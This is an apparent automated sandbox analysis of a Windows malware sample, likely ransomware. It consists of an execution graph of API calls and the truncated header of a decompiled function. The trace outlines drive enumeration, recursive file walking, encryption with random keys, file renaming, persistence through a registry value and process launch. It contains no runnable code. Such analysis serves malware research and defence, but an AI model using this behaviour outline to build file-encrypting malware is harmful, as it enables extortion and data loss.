                                                                                                                                                        execution_graph 4448 409f20 4451 409c57 4448->4451 4512 408b05 4451->4512 4453 409c75 4520 402779 GetProcessHeap RtlAllocateHeap 4453->4520 4455 409c7c 4521 40278d 4455->4521 4457 409ca0 4458 40278d 4 API calls 4457->4458 4459 409cb6 4458->4459 4460 409cc3 GetModuleFileNameW 4459->4460 4461 408b05 5 API calls 4460->4461 4462 409cef 4461->4462 4463 408b05 5 API calls 4462->4463 4464 409d04 4463->4464 4524 4093f4 MultiByteToWideChar 4464->4524 4466 409d0b 4527 409aab 4466->4527 4468 409d2a 4469 409aab 8 API calls 4468->4469 4470 409d49 4469->4470 4533 402779 GetProcessHeap RtlAllocateHeap 4470->4533 4472 409d54 GetEnvironmentVariableW 4473 409d6a GetEnvironmentVariableW 4472->4473 4474 409d7e PathAddBackslashW PathFindFileNameW lstrcatW lstrcmpiW 4472->4474 4473->4474 4475 409d77 ExitProcess 4473->4475 4476 409dc8 4474->4476 4477 409dad 4474->4477 4535 409610 _chkstk RegOpenKeyExW 4476->4535 4534 409333 GetFileAttributesW 4477->4534 4481 409dce 4541 402779 GetProcessHeap RtlAllocateHeap 4481->4541 4482 409db2 4482->4476 4484 409db6 CopyFileW 4482->4484 4484->4476 4484->4481 4485 409dd8 GetEnvironmentVariableW 4486 409e00 4485->4486 4487 409ded GetEnvironmentVariableW 4485->4487 4488 40278d 4 API calls 4486->4488 4487->4475 4487->4486 4489 409e10 4488->4489 4490 40278d 4 API calls 4489->4490 4491 409e22 4490->4491 4542 402828 4491->4542 4493 409e39 4494 4093f4 4 API calls 4493->4494 4495 409e3f 4494->4495 4496 4093f4 4 API calls 4495->4496 4497 409e50 lstrcpyW 4496->4497 4545 402779 GetProcessHeap RtlAllocateHeap 4497->4545 4499 409e69 lstrcpyW PathAddBackslashW lstrcatW 4500 409e83 4499->4500 4502 409e8f Sleep 4500->4502 4503 409ea3 4500->4503 4546 409b37 CreateFileW 4500->4546 4502->4500 4504 40278d 4 API calls 4503->4504 4505 409ec0 4504->4505 4506 40278d 4 API calls 4505->4506 4507 409ee8 4506->4507 4565 40998f GetProcessHeap HeapAlloc GetLogicalDrives 4507->4565 4509 409f12 4572 409435 4509->4572 4513 408b14 4512->4513 4582 406cea 4513->4582 4515 408c25 4590 408c36 4515->4590 4517 408c2e 4517->4453 4519 408b89 4519->4515 4586 40894f 4519->4586 4520->4455 4522 402798 GetProcessHeap HeapReAlloc 4521->4522 4523 4027ac GetProcessHeap RtlAllocateHeap 4521->4523 4522->4457 4523->4457 4600 402779 GetProcessHeap RtlAllocateHeap 4524->4600 4526 409417 MultiByteToWideChar 4526->4466 4528 408b05 5 API calls 4527->4528 4529 409ac6 lstrlenA 4528->4529 4530 409ae1 HeapCreate HeapAlloc 4529->4530 4531 409ad5 4529->4531 4532 409b0a 4530->4532 4531->4530 4532->4468 4533->4472 4534->4482 4536 409644 RegQueryValueExW lstrcmpiW 4535->4536 4537 4096cb 4535->4537 4538 4096c0 RegCloseKey 4536->4538 4539 40967f RegCreateKeyExW 4536->4539 4537->4481 4538->4537 4539->4538 4540 40969b lstrlenW RegSetValueExW 4539->4540 4540->4538 4541->4485 4601 402779 GetProcessHeap RtlAllocateHeap 4542->4601 4544 402840 4544->4493 4544->4544 4545->4499 4547 409b68 GetLastError 4546->4547 4548 409b5d GetLastError 4546->4548 4550 409be0 4547->4550 4551 409b78 4547->4551 4549 409c50 4548->4549 4549->4500 4552 409c45 CloseHandle 4550->4552 4553 409be8 ReadFile 4550->4553 4602 402779 GetProcessHeap RtlAllocateHeap 4551->4602 4552->4549 4555 409c41 GetLastError 4553->4555 4556 409c06 4553->4556 4555->4552 4556->4555 4558 409c10 SetFilePointer ReadFile 4556->4558 4557 409b82 4603 40a102 4557->4603 4558->4555 4560 409c33 4558->4560 4560->4555 4562 409c3d 4560->4562 4561 409bab 4627 402765 GetProcessHeap RtlFreeHeap 4561->4627 4562->4552 4564 409bbd SetFilePointer WriteFile 4564->4552 4566 4099d6 4565->4566 4567 409a33 4566->4567 4568 4099e2 GetDriveTypeA 4566->4568 4570 4099ff GetProcessHeap HeapAlloc lstrcpyA 4566->4570 4569 409a8e WaitForMultipleObjects 4567->4569 4571 409a46 GetProcessHeap HeapAlloc CreateThread 4567->4571 4568->4566 4568->4570 4569->4509 4570->4566 4571->4569 4571->4571 5066 4096d7 _chkstk 4571->5066 5197 402779 GetProcessHeap RtlAllocateHeap 4572->5197 4574 409443 5198 402779 GetProcessHeap RtlAllocateHeap 4574->5198 4576 40944b GetTempPathW GetTempFileNameW lstrcatW CreateFileW 4577 409492 4576->4577 4578 4094af 4576->4578 4579 408b05 5 API calls 4577->4579 4580 4094a9 4579->4580 5199 4092f1 4580->5199 4583 406d09 4582->4583 4584 406cf5 4582->4584 4583->4519 4584->4583 4594 40274b GetProcessHeap HeapAlloc 4584->4594 4587 408a29 4586->4587 4589 408991 4586->4589 4587->4515 4588 4089d7 WriteFile 4588->4589 4589->4587 4589->4588 4591 408c42 4590->4591 4595 406ca4 4591->4595 4593 408c4b 4593->4517 4594->4583 4596 406cad 4595->4596 4598 406cdd 4595->4598 4596->4598 4599 402765 GetProcessHeap RtlFreeHeap 4596->4599 4598->4593 4599->4598 4600->4526 4601->4544 4602->4557 4604 40a121 4603->4604 4605 40a13e lstrlenA 4604->4605 4606 40a166 4605->4606 4607 40a2c3 4606->4607 4628 40741d 4606->4628 4658 402765 GetProcessHeap RtlFreeHeap 4607->4658 4611 40a2df 4659 402765 GetProcessHeap RtlFreeHeap 4611->4659 4614 40a2e5 4660 402765 GetProcessHeap RtlFreeHeap 4614->4660 4616 40a2eb 4661 4077f1 4616->4661 4617 40a1c2 4617->4607 4688 402779 GetProcessHeap RtlAllocateHeap 4617->4688 4620 40a2f8 4620->4561 4621 40a1e6 4621->4607 4689 402779 GetProcessHeap RtlAllocateHeap 4621->4689 4623 40a21b 4623->4607 4690 402779 GetProcessHeap RtlAllocateHeap 4623->4690 4625 40a252 4691 409fca 4625->4691 4627->4564 4629 407640 4628->4629 4630 40742d 4628->4630 4629->4607 4655 409fb4 4629->4655 4630->4629 4703 403cf3 4630->4703 4633 405a85 GetProcessHeap HeapAlloc GetProcessHeap RtlFreeHeap _aulldiv 4647 40748a 4633->4647 4635 4039c0 2 API calls 4636 407622 4635->4636 4637 4039c0 2 API calls 4636->4637 4638 40762c 4637->4638 4639 4039c0 2 API calls 4638->4639 4640 407636 4639->4640 4640->4629 4641 4077f1 2 API calls 4640->4641 4641->4629 4642 4075a4 4729 40561b 4642->4729 4647->4633 4647->4642 4651 40477a GetProcessHeap HeapAlloc GetProcessHeap RtlFreeHeap 4647->4651 4652 4075f4 4647->4652 4653 4047bf GetProcessHeap HeapAlloc GetProcessHeap RtlFreeHeap 4647->4653 4706 4054a0 4647->4706 4648 404da2 5 API calls 4649 4075e0 4648->4649 4650 40561b 5 API calls 4649->4650 4649->4652 4650->4652 4651->4647 4785 4039c0 4652->4785 4653->4647 4904 409f2e 4655->4904 4658->4611 4659->4614 4660->4616 4662 4039c0 2 API calls 4661->4662 4663 407802 4662->4663 4664 4039c0 2 API calls 4663->4664 4665 40780e 4664->4665 4666 4039c0 2 API calls 4665->4666 4667 40781a 4666->4667 4668 4039c0 2 API calls 4667->4668 4669 407823 4668->4669 4670 4039c0 2 API calls 4669->4670 4671 40782c 4670->4671 4672 4039c0 2 API calls 4671->4672 4673 407835 4672->4673 4674 4039c0 2 API calls 4673->4674 4675 40783e 4674->4675 4676 4039c0 2 API calls 4675->4676 4677 407847 4676->4677 4678 4039c0 2 API calls 4677->4678 4679 407850 4678->4679 4680 4039c0 2 API calls 4679->4680 4681 407859 4680->4681 4682 4039c0 2 API calls 4681->4682 4683 407862 4682->4683 4684 4039c0 2 API calls 4683->4684 4685 40786b 4684->4685 4686 4039c0 2 API calls 4685->4686 4687 407874 4686->4687 4687->4620 4688->4621 4689->4623 4690->4625 4692 409feb 4691->4692 4693 40a01f lstrlenA 4692->4693 4694 40a045 4693->4694 4697 40a0c1 4694->4697 4917 403e75 4694->4917 4699 4077f1 2 API calls 4697->4699 4698 403e75 5 API calls 4701 40a071 4698->4701 4700 40a0f7 4699->4700 4700->4607 4701->4697 4933 407659 4701->4933 4789 4039f5 4703->4789 4705 403d01 4705->4647 4707 4054b0 4706->4707 4797 403aea 4707->4797 4709 4054ce 4711 403aea 4 API calls 4709->4711 4726 4055f3 4709->4726 4710 4039c0 2 API calls 4712 405600 4710->4712 4717 4054e4 4711->4717 4713 4039c0 2 API calls 4712->4713 4714 405609 4713->4714 4715 4039c0 2 API calls 4714->4715 4716 405612 4715->4716 4716->4647 4717->4726 4804 404324 4717->4804 4720 404324 4 API calls 4727 405527 4720->4727 4721 4055d7 4808 40425a 4721->4808 4724 404324 GetProcessHeap HeapAlloc GetProcessHeap RtlFreeHeap 4724->4727 4725 403aea 4 API calls 4725->4726 4726->4710 4727->4721 4727->4724 4727->4726 4728 4045ee GetProcessHeap HeapAlloc GetProcessHeap RtlFreeHeap 4727->4728 4728->4727 4731 405630 4729->4731 4730 405634 4730->4652 4777 404da2 4730->4777 4731->4730 4732 4054a0 4 API calls 4731->4732 4736 4056a9 4732->4736 4733 4056c6 4734 4039c0 2 API calls 4733->4734 4735 4059ad 4734->4735 4737 4039c0 2 API calls 4735->4737 4736->4733 4738 404da2 5 API calls 4736->4738 4739 4059b7 4737->4739 4740 4056e0 4738->4740 4741 4039c0 2 API calls 4739->4741 4740->4733 4743 403aea 4 API calls 4740->4743 4742 4059c1 4741->4742 4744 4039c0 2 API calls 4742->4744 4745 4056f9 4743->4745 4746 4059cb 4744->4746 4745->4733 4749 403aea 4 API calls 4745->4749 4747 4039c0 2 API calls 4746->4747 4748 4059d5 4747->4748 4750 4039c0 2 API calls 4748->4750 4751 40570e 4749->4751 4752 4059df 4750->4752 4751->4733 4754 403aea 4 API calls 4751->4754 4753 4039c0 2 API calls 4752->4753 4755 4059e9 4753->4755 4756 405723 4754->4756 4757 4039c0 2 API calls 4755->4757 4756->4733 4759 403cf3 4 API calls 4756->4759 4758 4059f3 4757->4758 4760 4039c0 2 API calls 4758->4760 4761 405738 4759->4761 4760->4730 4761->4733 4762 403cf3 4 API calls 4761->4762 4763 40574d 4762->4763 4763->4733 4764 403cf3 4 API calls 4763->4764 4765 405762 4764->4765 4765->4733 4766 403cf3 4 API calls 4765->4766 4768 405777 4766->4768 4767 4046dd GetProcessHeap HeapAlloc GetProcessHeap RtlFreeHeap 4767->4768 4768->4733 4768->4767 4769 404685 GetProcessHeap HeapAlloc GetProcessHeap RtlFreeHeap 4768->4769 4770 404324 GetProcessHeap HeapAlloc GetProcessHeap RtlFreeHeap 4768->4770 4771 405945 4768->4771 4769->4768 4770->4768 4771->4733 4773 40596c 4771->4773 4812 404685 4771->4812 4773->4733 4774 405993 4773->4774 4821 4046dd 4773->4821 4775 403aea 4 API calls 4774->4775 4775->4733 4778 404db1 4777->4778 4779 404db5 4778->4779 4846 40491f 4778->4846 4779->4648 4779->4652 4781 404dcc 4781->4779 4782 404685 4 API calls 4781->4782 4783 404de7 4781->4783 4782->4781 4783->4779 4784 4046dd 4 API calls 4783->4784 4784->4783 4786 4039c9 4785->4786 4788 4039e2 4785->4788 4786->4788 4903 402765 GetProcessHeap RtlFreeHeap 4786->4903 4788->4635 4790 403a07 4789->4790 4794 403a02 4789->4794 4790->4794 4795 40274b GetProcessHeap HeapAlloc 4790->4795 4792 403a1d 4792->4794 4796 402765 GetProcessHeap RtlFreeHeap 4792->4796 4794->4705 4795->4792 4796->4794 4798 403af8 4797->4798 4799 403afc 4797->4799 4798->4709 4800 403b03 4799->4800 4801 403b0b 4799->4801 4802 4039c0 2 API calls 4800->4802 4803 4039f5 4 API calls 4801->4803 4802->4798 4803->4798 4805 404345 4804->4805 4806 403cf3 4 API calls 4805->4806 4807 40434b 4805->4807 4806->4807 4807->4720 4807->4726 4809 40427d 4808->4809 4810 4039f5 4 API calls 4809->4810 4811 4042a1 4809->4811 4810->4811 4811->4725 4811->4726 4813 4046c7 4812->4813 4814 40469e 4812->4814 4838 404525 4813->4838 4816 4046b4 4814->4816 4817 4046a7 4814->4817 4819 4045ee 4 API calls 4816->4819 4830 4045ee 4817->4830 4820 4046b2 4819->4820 4820->4771 4822 4046f6 4821->4822 4823 40471f 4821->4823 4826 40470c 4822->4826 4827 4046ff 4822->4827 4824 404525 4 API calls 4823->4824 4825 40470a 4824->4825 4825->4773 4828 4045ee 4 API calls 4826->4828 4829 4045ee 4 API calls 4827->4829 4828->4825 4829->4825 4831 404601 4830->4831 4832 404626 4831->4832 4833 403aea 4 API calls 4831->4833 4837 404605 4831->4837 4834 40463d 4832->4834 4835 403aea 4 API calls 4832->4835 4833->4832 4836 4039c0 2 API calls 4834->4836 4835->4834 4836->4837 4837->4820 4839 404533 4838->4839 4840 40454a 4839->4840 4841 403aea 4 API calls 4839->4841 4842 4039f5 4 API calls 4840->4842 4843 4045e5 4840->4843 4841->4840 4844 40457f 4842->4844 4843->4820 4844->4843 4845 4039f5 4 API calls 4844->4845 4845->4844 4847 404931 4846->4847 4848 404980 4847->4848 4849 4049bb 4847->4849 4854 404935 4847->4854 4851 404990 4848->4851 4853 403cf3 4 API calls 4848->4853 4850 403aea 4 API calls 4849->4850 4852 4049c6 4850->4852 4851->4854 4855 403aea 4 API calls 4851->4855 4891 4049aa 4851->4891 4857 403aea 4 API calls 4852->4857 4852->4891 4853->4851 4854->4781 4855->4891 4856 4039c0 2 API calls 4858 404d26 4856->4858 4859 4049db 4857->4859 4860 4039c0 2 API calls 4858->4860 4862 4039f5 4 API calls 4859->4862 4859->4891 4861 404d30 4860->4861 4863 4039c0 2 API calls 4861->4863 4864 4049ff 4862->4864 4865 404d3a 4863->4865 4867 403cf3 4 API calls 4864->4867 4864->4891 4866 4039c0 2 API calls 4865->4866 4868 404d44 4866->4868 4869 404a14 4867->4869 4870 4039c0 2 API calls 4868->4870 4871 4039f5 4 API calls 4869->4871 4869->4891 4870->4854 4872 404a2a 4871->4872 4873 4039f5 4 API calls 4872->4873 4872->4891 4874 404a40 4873->4874 4875 404a7f 4874->4875 4876 40425a 4 API calls 4874->4876 4874->4891 4877 40425a 4 API calls 4875->4877 4875->4891 4878 404a6a 4876->4878 4880 404ab3 4877->4880 4879 40425a 4 API calls 4878->4879 4878->4891 4879->4875 4881 404ae9 4880->4881 4882 4046dd 4 API calls 4880->4882 4880->4891 4883 404324 4 API calls 4881->4883 4882->4880 4894 404af7 4883->4894 4884 404cad 4885 403aea 4 API calls 4884->4885 4886 404cc0 4884->4886 4885->4886 4888 404324 4 API calls 4886->4888 4886->4891 4889 404cee 4888->4889 4890 403aea 4 API calls 4889->4890 4889->4891 4890->4891 4891->4854 4891->4856 4892 4048ef GetProcessHeap HeapAlloc GetProcessHeap RtlFreeHeap 4892->4894 4893 403cf3 GetProcessHeap HeapAlloc GetProcessHeap RtlFreeHeap 4893->4894 4894->4884 4894->4891 4894->4892 4894->4893 4895 4046dd 4 API calls 4894->4895 4896 403aea 4 API calls 4894->4896 4897 40425a GetProcessHeap HeapAlloc GetProcessHeap RtlFreeHeap 4894->4897 4898 404685 4 API calls 4894->4898 4899 405ef4 4894->4899 4895->4894 4896->4894 4897->4894 4898->4894 4900 405f01 4899->4900 4902 405f1e 4899->4902 4901 405f08 _aulldiv 4900->4901 4900->4902 4901->4902 4902->4894 4903->4788 4905 409f4d 4904->4905 4911 403feb 4905->4911 4908 409f96 4908->4617 4909 409f6b lstrlenA 4909->4908 4910 409f82 WriteFile 4909->4910 4910->4908 4912 40402a 4911->4912 4913 404007 4911->4913 4912->4908 4912->4909 4913->4912 4914 403aea 4 API calls 4913->4914 4916 404067 4913->4916 4914->4916 4915 4039c0 2 API calls 4915->4912 4916->4915 4918 403e8c 4917->4918 4919 403fda 4917->4919 4920 403e96 lstrlenA 4918->4920 4919->4697 4919->4698 4921 403f53 4920->4921 4922 403eab 4920->4922 4923 403cf3 4 API calls 4921->4923 4922->4919 4924 4039f5 4 API calls 4922->4924 4930 403f60 4923->4930 4925 403ed5 4924->4925 4927 403cf3 4 API calls 4925->4927 4928 403ee8 4925->4928 4926 4039c0 2 API calls 4926->4919 4927->4928 4928->4926 4930->4928 4937 4048ef 4930->4937 4940 404735 4930->4940 4943 40477a 4930->4943 4934 407668 4933->4934 4935 40766f 4933->4935 4934->4697 4960 407b37 4935->4960 4946 4047bf 4937->4946 4941 404685 4 API calls 4940->4941 4942 404774 4941->4942 4942->4930 4944 4046dd 4 API calls 4943->4944 4945 4047b9 4944->4945 4945->4930 4947 4047ce 4946->4947 4948 4047ef 4947->4948 4949 403aea 4 API calls 4947->4949 4950 403aea 4 API calls 4948->4950 4951 404814 4948->4951 4959 40487c 4948->4959 4949->4948 4950->4951 4953 4039f5 4 API calls 4951->4953 4951->4959 4952 4039c0 2 API calls 4954 4048db 4952->4954 4955 40486c 4953->4955 4956 4039c0 2 API calls 4954->4956 4957 403cf3 4 API calls 4955->4957 4955->4959 4958 4048e5 4956->4958 4957->4959 4958->4930 4959->4952 4961 407b45 4960->4961 4962 407b4e 4961->4962 4963 407c23 4961->4963 4964 407c2b 4961->4964 4962->4934 4967 407878 4963->4967 4975 4079dd 4964->4975 4968 407889 4967->4968 4997 404179 4968->4997 4970 4039c0 2 API calls 4971 4078ed 4970->4971 4971->4962 4972 40789b 4974 4078b2 4972->4974 5003 404eb2 4972->5003 4974->4970 4976 4079f1 4975->4976 4988 407b1a 4975->4988 4977 404179 4 API calls 4976->4977 4976->4988 4981 407a32 4977->4981 4978 407a4f 4979 4039c0 2 API calls 4978->4979 4980 407b06 4979->4980 4982 4039c0 2 API calls 4980->4982 4981->4978 4995 407a99 4981->4995 5045 407903 4981->5045 4983 407b10 4982->4983 4985 4039c0 2 API calls 4983->4985 4984 404eb2 5 API calls 4987 407ab3 4984->4987 4985->4988 4987->4978 4991 4047bf 4 API calls 4987->4991 4988->4962 4990 4047bf 4 API calls 4992 407a87 4990->4992 4993 407acf 4991->4993 4992->4978 4994 404da2 5 API calls 4992->4994 4993->4978 4996 404da2 5 API calls 4993->4996 4994->4995 4995->4978 4995->4984 4996->4978 4998 404189 4997->4998 4999 4039f5 4 API calls 4998->4999 5000 4041b5 4999->5000 5001 403cf3 4 API calls 5000->5001 5002 4041c0 5000->5002 5001->5002 5002->4972 5002->5002 5005 404ecb 5003->5005 5004 40544a 5004->4974 5005->5004 5006 4039f5 4 API calls 5005->5006 5007 404f7b 5006->5007 5008 4053e8 5007->5008 5009 4039f5 4 API calls 5007->5009 5010 405410 5008->5010 5013 4039c0 2 API calls 5008->5013 5011 404f96 5009->5011 5012 4039c0 2 API calls 5010->5012 5011->5008 5015 4039f5 4 API calls 5011->5015 5014 40541a 5012->5014 5013->5008 5016 4039c0 2 API calls 5014->5016 5017 404fb1 5015->5017 5018 405424 5016->5018 5017->5008 5020 404fdd 5017->5020 5022 403aea 4 API calls 5017->5022 5019 4039c0 2 API calls 5018->5019 5021 40542e 5019->5021 5020->5008 5024 403cf3 4 API calls 5020->5024 5029 405007 5020->5029 5021->5004 5023 4039c0 2 API calls 5021->5023 5022->5020 5023->5004 5025 40501b 5024->5025 5025->5008 5026 40425a 4 API calls 5025->5026 5027 405036 5026->5027 5027->5008 5028 404da2 5 API calls 5027->5028 5028->5029 5029->5008 5030 405091 5029->5030 5031 405087 5029->5031 5033 403aea 4 API calls 5030->5033 5032 404da2 5 API calls 5031->5032 5034 40508f 5032->5034 5033->5034 5034->5008 5035 403aea 4 API calls 5034->5035 5036 4050d6 5035->5036 5036->5008 5037 4039f5 4 API calls 5036->5037 5040 405214 5036->5040 5038 40512b 5037->5038 5038->5008 5039 403aea 4 API calls 5038->5039 5041 405143 5039->5041 5040->5008 5042 404685 4 API calls 5040->5042 5041->5008 5041->5040 5043 4039f5 4 API calls 5041->5043 5044 403aea 4 API calls 5041->5044 5042->5008 5043->5041 5044->5041 5046 407915 5045->5046 5054 40795e 5045->5054 5047 4047bf 4 API calls 5046->5047 5050 407923 5047->5050 5048 40795c 5048->4978 5048->4990 5050->5048 5051 404da2 5 API calls 5050->5051 5053 407936 5051->5053 5052 4054a0 4 API calls 5052->5054 5053->5048 5055 4047bf 4 API calls 5053->5055 5054->5048 5054->5052 5057 4079a4 5054->5057 5062 40545d 5054->5062 5056 40794c 5055->5056 5056->5048 5058 404da2 5 API calls 5056->5058 5059 40561b 5 API calls 5057->5059 5058->5048 5060 4079bb 5059->5060 5060->5048 5061 404eb2 5 API calls 5060->5061 5061->5048 5063 405474 5062->5063 5064 40546f 5062->5064 5063->5064 5065 404179 4 API calls 5063->5065 5064->5054 5065->5064 5067 4096ef 5066->5067 5068 4093f4 4 API calls 5067->5068 5073 40971e 5067->5073 5069 409747 5068->5069 5093 40a321 5069->5093 5071 409752 5071->5073 5098 40a356 5071->5098 5075 4097c6 lstrcmpiW 5076 409939 FindNextFileW 5075->5076 5077 4097da lstrcmpiW 5075->5077 5076->5075 5078 40994d FindClose 5076->5078 5077->5076 5079 4097ee lstrcatW 5077->5079 5078->5071 5105 4094b3 WideCharToMultiByte 5079->5105 5081 40922b 6 API calls 5088 409813 5081->5088 5082 409862 lstrcmpiW 5084 409877 lstrcmpiW 5082->5084 5082->5088 5083 40982c lstrcatW 5086 40a321 4 API calls 5083->5086 5087 40988c PathFindFileNameW lstrcmpiW 5084->5087 5084->5088 5086->5088 5087->5088 5088->5076 5088->5081 5088->5082 5088->5083 5089 4098b0 SetFileAttributesW 5088->5089 5091 4098e3 lstrcpyW lstrcatW MoveFileExW 5088->5091 5108 408d77 5088->5108 5162 402765 GetProcessHeap RtlFreeHeap 5088->5162 5089->5088 5151 40934a PathRemoveFileSpecW PathAddBackslashW lstrcatW 5091->5151 5163 402779 GetProcessHeap RtlAllocateHeap 5093->5163 5095 40a32a 5164 40a39b lstrlenW 5095->5164 5097 40a336 5097->5071 5099 40a361 5098->5099 5100 40a365 lstrcpyW 5099->5100 5101 409785 lstrlenW lstrcatW FindFirstFileW 5099->5101 5168 402765 GetProcessHeap RtlFreeHeap 5100->5168 5101->5071 5101->5075 5103 40a380 5169 402765 GetProcessHeap RtlFreeHeap 5103->5169 5170 402779 GetProcessHeap RtlAllocateHeap 5105->5170 5107 4094d5 WideCharToMultiByte 5107->5088 5109 408da5 5108->5109 5171 40274b GetProcessHeap HeapAlloc 5109->5171 5111 408dbc CreateFileW 5112 408df0 GetFileSizeEx 5111->5112 5113 4091f1 5111->5113 5112->5113 5120 408e04 5112->5120 5114 4091f7 FindCloseChangeNotification 5113->5114 5115 4091fe 5113->5115 5114->5115 5193 402765 GetProcessHeap RtlFreeHeap 5115->5193 5117 409204 5118 406ca4 2 API calls 5117->5118 5119 408e31 5118->5119 5119->5088 5120->5113 5120->5119 5121 406cea 2 API calls 5120->5121 5122 408e87 5121->5122 5122->5113 5123 408ec3 lstrlenW 5122->5123 5124 408ee2 5123->5124 5172 408ac1 SetFilePointerEx 5124->5172 5127 408fd5 CloseHandle 5127->5119 5129 408fef 5130 409038 _alldiv _allrem 5129->5130 5131 409084 5130->5131 5132 409069 5130->5132 5176 402779 GetProcessHeap RtlAllocateHeap 5131->5176 5132->5131 5133 40906f _allrem 5132->5133 5133->5131 5135 4090a7 5136 409fca 7 API calls 5135->5136 5137 4090d9 5136->5137 5137->5127 5138 4090e1 5137->5138 5139 40910c WriteFile 5138->5139 5140 40278d 4 API calls 5139->5140 5141 40912e 5140->5141 5177 402765 GetProcessHeap RtlFreeHeap 5141->5177 5143 40913b 5178 408c4c 5143->5178 5146 409196 5148 408ac1 2 API calls 5146->5148 5147 408c4c 10 API calls 5147->5146 5149 4091b1 5148->5149 5150 4091d5 WriteFile 5149->5150 5150->5113 5196 409333 GetFileAttributesW 5151->5196 5153 409372 5154 409376 CreateFileW 5153->5154 5155 4093ee 5153->5155 5154->5155 5156 409396 5154->5156 5155->5088 5157 408b05 5 API calls 5156->5157 5158 4093b3 WriteFile 5157->5158 5159 408b05 5 API calls 5158->5159 5160 4093e3 5159->5160 5160->5155 5161 4093e7 FindCloseChangeNotification 5160->5161 5161->5155 5162->5088 5163->5095 5167 402779 GetProcessHeap RtlAllocateHeap 5164->5167 5166 40a3b3 lstrcpyW 5166->5097 5167->5166 5168->5103 5169->5101 5170->5107 5171->5111 5173 408ae8 GetLastError 5172->5173 5174 408af2 5172->5174 5173->5174 5174->5127 5175 402779 GetProcessHeap RtlAllocateHeap 5174->5175 5175->5129 5176->5135 5177->5143 5179 408ac1 2 API calls 5178->5179 5180 408c66 5179->5180 5194 402779 GetProcessHeap RtlAllocateHeap 5180->5194 5182 408c7d 5183 408c91 ReadFile 5182->5183 5192 408d6d 5182->5192 5186 408cb3 5183->5186 5191 408d03 5183->5191 5184 408cb9 _allrem 5184->5186 5185 408ac1 2 API calls 5188 408d54 WriteFile 5185->5188 5186->5184 5186->5191 5187 408d14 _allrem 5189 408d23 5187->5189 5195 402765 GetProcessHeap RtlFreeHeap 5188->5195 5189->5185 5191->5187 5191->5189 5192->5146 5192->5147 5193->5117 5194->5182 5195->5192 5196->5153 5197->4574 5198->4576 5202 402647 5199->5202 5203 40264f CreateProcessW 5202->5203 5203->4578 5227 403c22 5228 403c37 5227->5228 5232 403c30 5227->5232 5229 4039f5 4 API calls 5228->5229 5230 403c4e 5229->5230 5231 4039f5 4 API calls 5230->5231 5230->5232 5231->5232 5233 4070c2 5234 4070cb 5233->5234 5237 402765 GetProcessHeap RtlFreeHeap 5234->5237 5236 4070d4 5237->5236 5204 4069e5 5206 4069fd 5204->5206 5207 4069f5 5204->5207 5206->5206 5206->5207 5208 406b42 5206->5208 5209 406b5a 5208->5209 5210 406b5f 5208->5210 5209->5206 5210->5209 5212 406bce CryptAcquireContextW 5210->5212 5213 406bf1 5212->5213 5214 406bf6 CryptGenRandom 5212->5214 5213->5210 5215 406c1a CryptReleaseContext 5214->5215 5216 406c0f CryptReleaseContext 5214->5216 5215->5213 5216->5213 5217 403a65 5218 403a76 5217->5218 5219 403a7f 5217->5219 5220 4039f5 4 API calls 5218->5220 5225 40274b GetProcessHeap HeapAlloc 5219->5225 5224 403a7d 5220->5224 5222 403aa3 5222->5224 5226 402765 GetProcessHeap RtlFreeHeap 5222->5226 5225->5222 5226->5224 5274 4070a6 5277 40274b GetProcessHeap HeapAlloc 5274->5277 5276 4070b0 5277->5276 5245 40768b 5246 403aea 4 API calls 5245->5246 5247 4076ad 5246->5247 5248 403aea 4 API calls 5247->5248 5272 4077c3 5247->5272 5250 4076c4 5248->5250 5249 4077f1 2 API calls 5273 4077c9 5249->5273 5251 403aea 4 API calls 5250->5251 5250->5272 5252 4076db 5251->5252 5253 403aea 4 API calls 5252->5253 5252->5272 5254 4076f2 5253->5254 5255 403aea 4 API calls 5254->5255 5254->5272 5256 407709 5255->5256 5257 403aea 4 API calls 5256->5257 5256->5272 5258 407720 5257->5258 5259 403aea 4 API calls 5258->5259 5258->5272 5260 407737 5259->5260 5261 403aea 4 API calls 5260->5261 5260->5272 5262 40774e 5261->5262 5263 403aea 4 API calls 5262->5263 5262->5272 5264 407765 5263->5264 5265 403aea 4 API calls 5264->5265 5264->5272 5266 407778 5265->5266 5267 403aea 4 API calls 5266->5267 5266->5272 5268 407791 5267->5268 5269 403aea 4 API calls 5268->5269 5268->5272 5270 4077aa 5269->5270 5271 403aea 4 API calls 5270->5271 5270->5272 5271->5272 5272->5249 5272->5273 5290 4021b4 5291 4021bc 5290->5291 5292 402285 5291->5292 5296 4023d5 5291->5296 5294 4021f5 5300 4022c0 RtlUnwind 5294->5300 5297 4023ea 5296->5297 5299 402406 5296->5299 5298 402475 NtQueryVirtualMemory 5297->5298 5297->5299 5298->5299 5299->5294 5299->5299 5300->5294 5238 4094f5 _chkstk 5239 402647 5238->5239 5240 409521 GetModuleFileNameW 5239->5240 5241 409540 GetEnvironmentVariableW 5240->5241 5242 40960a 5240->5242 5241->5242 5243 40955b lstrcatW lstrcatW lstrcatW ShellExecuteExW 5241->5243 5243->5242 5244 4095ca 6 API calls 5243->5244 5244->5242 5281 406fd5 5282 406fe1 5281->5282 5283 406fe8 5281->5283 5284 406cea 2 API calls 5283->5284 5285 406fff 5284->5285 5285->5282 5286 406ca4 2 API calls 5285->5286 5286->5282 5287 403b98 5288 4039f5 4 API calls 5287->5288 5289 403bb9 5288->5289 5278 404d5a 5279 40491f 5 API calls 5278->5279 5280 404d9c 5279->5280 5301 4021bc 5302 402285 5301->5302 5303 4021da 5301->5303 5304 4023d5 NtQueryVirtualMemory 5303->5304 5306 4021f5 5304->5306 5307 4022c0 RtlUnwind 5306->5307 5307->5306

                                                                                                                                                        Executed Functions

                                                                                                                                                        Control-flow Graph

                                                                                                                                                        C-Code - Quality: 90%
                                                                                                                                                        			E004096D7(void* __edi, void* __esi, void* __ebp, struct _WIN32_FIND_DATAW _a4, intOrPtr _a8, struct _WIN32_FIND_DATAW _a12, short _a56, char _a600, char _a604, char _a608, char _a920, char _a924, short _a1420, short _a1428, short _a1436, short _a5516, intOrPtr* _a9636) {
                                                                                                                                                        				short _v0;
                                                                                                                                                        				long _v4;
                                                                                                                                                        				char _v8;
                                                                                                                                                        				char _v16;
                                                                                                                                                        				void* __ebx;
                                                                                                                                                        				intOrPtr* _t64;
                                                                                                                                                        				long _t74;
                                                                                                                                                        				void* _t84;
                                                                                                                                                        				long _t88;
                                                                                                                                                        				int _t90;
                                                                                                                                                        				long _t93;
                                                                                                                                                        				void* _t99;
                                                                                                                                                        				long _t100;
                                                                                                                                                        				long _t103;
                                                                                                                                                        				long _t105;
                                                                                                                                                        				long _t108;
                                                                                                                                                        				signed int _t109;
                                                                                                                                                        				long _t123;
